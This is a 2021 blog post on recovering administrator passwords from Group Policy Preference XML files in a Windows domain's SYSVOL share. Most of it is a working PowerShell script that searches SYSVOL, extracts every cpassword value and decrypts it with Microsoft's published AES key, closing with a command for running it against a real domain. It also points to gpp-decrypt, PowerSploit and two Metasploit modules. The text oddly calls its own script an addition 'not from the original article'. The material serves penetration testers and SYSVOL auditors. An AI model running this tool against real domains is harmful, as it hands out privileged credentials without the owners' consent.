Sunday 14 February 2021

Stealing Admin Credentials via Group Policy Preferences

What are Group Policy Preferences?

Group Policy Preferences (GPP), introduced with Windows Server 2008, let administrators embed a set of credentials in a Group Policy Object so that changes needing a privileged account could be pushed out with no manual work: mapping drives, creating or resetting local administrator accounts, configuring services and scheduled tasks, and so on. The stored password is AES-256 encrypted, but the key is a single fixed value that Microsoft published in its own protocol documentation (MS-GPPREF), so anyone who can read the policy file can trivially recover the plaintext; no access to the domain controller itself is needed. Microsoft's fix, MS14-025 (https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-025), only stops new passwords being saved through GPP. It does not remove or rotate credentials already sitting in existing policy files, and those often outlive the patch by years, so a domain that is fully patched can still be carrying a plaintext-recoverable administrator password. For this reason checking for GPP passwords belongs in your privilege escalation checklist on every Windows domain penetration test (and in every defender's SYSVOL audit).

Accessing the stored GPP credentials

GPP stores the encrypted credential inside the policy's XML file under SYSVOL, which every domain controller shares as \\<domain>\SYSVOL (on the DC itself this is C:\Windows\SYSVOL\sysvol\<domain>\Policies\). The local user and group preference is written to Groups.xml, under ...\Machine\Preferences\Groups\ or ...\User\Preferences\Groups\ inside the GPO's {GUID} folder, and the same attribute turns up in Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml. To make matters worse, SYSVOL is readable by every authenticated domain user and not just administrators, so this is an easy win with low risk and high reward: no exploit, no privileged access, just a file read. The encrypted value is the cpassword attribute (usually written cPassword) of the Properties element in these files.


Decrypting the cPassword is as simple as passing it to gpp-decrypt, which ships with Kali (gpp-decrypt <cpassword>). PowerSploit's Get-GPPPassword does the SYSVOL search and the decryption in one step from a domain-joined host.
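The whole process, from finding the XML files in SYSVOL to decrypting what they hold, fits in a few dozen lines of PowerShell. The script below is an added example written for this post; it is not code from the original article, from gpp-decrypt or from PowerSploit. It assumes it is run as any domain user from a domain-joined host, derives the SYSVOL path from $env:USERDNSDOMAIN unless one is passed in, and the function and parameter names (ConvertFrom-GppCPassword, Get-GppPasswordFromXml, Find-GppPassword) are my own. The AES key is the one Microsoft published in MS-GPPREF; the sample Groups.xml fragment at the bottom is constructed for an offline run, with the cpassword value taken from the publicly circulated Hack The Box "Active" lab rather than any real environment.

```powershell
# Added example (not from the original post): walk SYSVOL for Group Policy
# Preference XML files and decrypt every cpassword attribute they carry, using
# the fixed AES-256 key Microsoft published in the MS-GPPREF documentation.
# Assumptions: run as any domain user from a domain-joined host; the SYSVOL
# path is derived from $env:USERDNSDOMAIN unless one is passed in.

# The published 32-byte key (MS-GPPREF, section 2.2.1.1.4 "Password Encryption").
$GppAesKey = [byte[]](
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b
)

function ConvertFrom-GppCPassword {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$CPassword)

    # The stored value is base64 with its '=' padding stripped; restore it first.
    $padded      = $CPassword + ('=' * ((4 - ($CPassword.Length % 4)) % 4))
    $cipherBytes = [Convert]::FromBase64String($padded)

    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key     = $GppAesKey
        $aes.IV      = New-Object byte[] 16          # all-zero IV, as the spec defines
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $plainBytes  = $aes.CreateDecryptor().TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
    } finally {
        $aes.Dispose()
    }
    # The plaintext password is UTF-16LE.
    [System.Text.Encoding]::Unicode.GetString($plainBytes)
}

function Get-GppPasswordFromXml {
    # Pull (account, password) pairs out of one parsed preference file, whatever
    # its type: Groups, Services, ScheduledTasks, DataSources, Drives or Printers.
    param([Parameter(Mandatory)][xml]$Document, [string]$Source = '<inline>')

    foreach ($node in $Document.SelectNodes('//*[@cpassword]')) {
        $cp = $node.GetAttribute('cpassword')
        if (-not $cp) { continue }                   # empty cpassword = no password set
        # The account attribute is named differently per preference type.
        $account = 'userName','username','runAs','accountName' |
            ForEach-Object { $node.GetAttribute($_) } |
            Where-Object { $_ } | Select-Object -First 1
        [pscustomobject]@{
            Source   = $Source
            Account  = $account
            Changed  = $node.ParentNode.changed      # last-modified stamp on the item element
            Password = ConvertFrom-GppCPassword -CPassword $cp
        }
    }
}

function Find-GppPassword {
    param([string]$SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL")

    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path $SysvolPath -Recurse -Include $names -ErrorAction SilentlyContinue |
        ForEach-Object {
            [xml]$doc = Get-Content -Path $_.FullName -Raw
            Get-GppPasswordFromXml -Document $doc -Source $_.FullName
        }
}

# Offline check with a constructed Groups.xml fragment (attributes trimmed to the
# ones that matter). The cpassword value is the publicly circulated sample from the
# Hack The Box "Active" lab, not a real credential; the account name is made up.
$sampleGroupsXml = @'
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="CORP\svc_backup" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" noChange="1" neverExpires="1" userName="CORP\svc_backup"/>
  </User>
</Groups>
'@
Get-GppPasswordFromXml -Document ([xml]$sampleGroupsXml) -Source 'constructed-sample' | Format-List

# Against a real domain:  Find-GppPassword | Format-Table -AutoSize
```

Two details worth keeping in mind when writing your own version: the cpassword value has its base64 padding stripped, so a naive FromBase64String call on the raw attribute throws, and the decrypted bytes are UTF-16LE, so decoding them as ASCII or UTF-8 gives a string full of null characters. The same scan, minus the decryption, is exactly what a defender should run after applying MS14-025 to find and delete the leftovers.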

 

Metasploit Module

Metasploit simplifies this process even further with modules that do the work for us: post/windows/gather/credentials/gpp runs through an existing session on a domain-joined host and searches SYSVOL for the preference files, while auxiliary/scanner/smb/smb_enum_gpp needs only a set of domain credentials and pulls them over SMB from a domain controller. Both decrypt the cpassword values for you and save the results as loot.
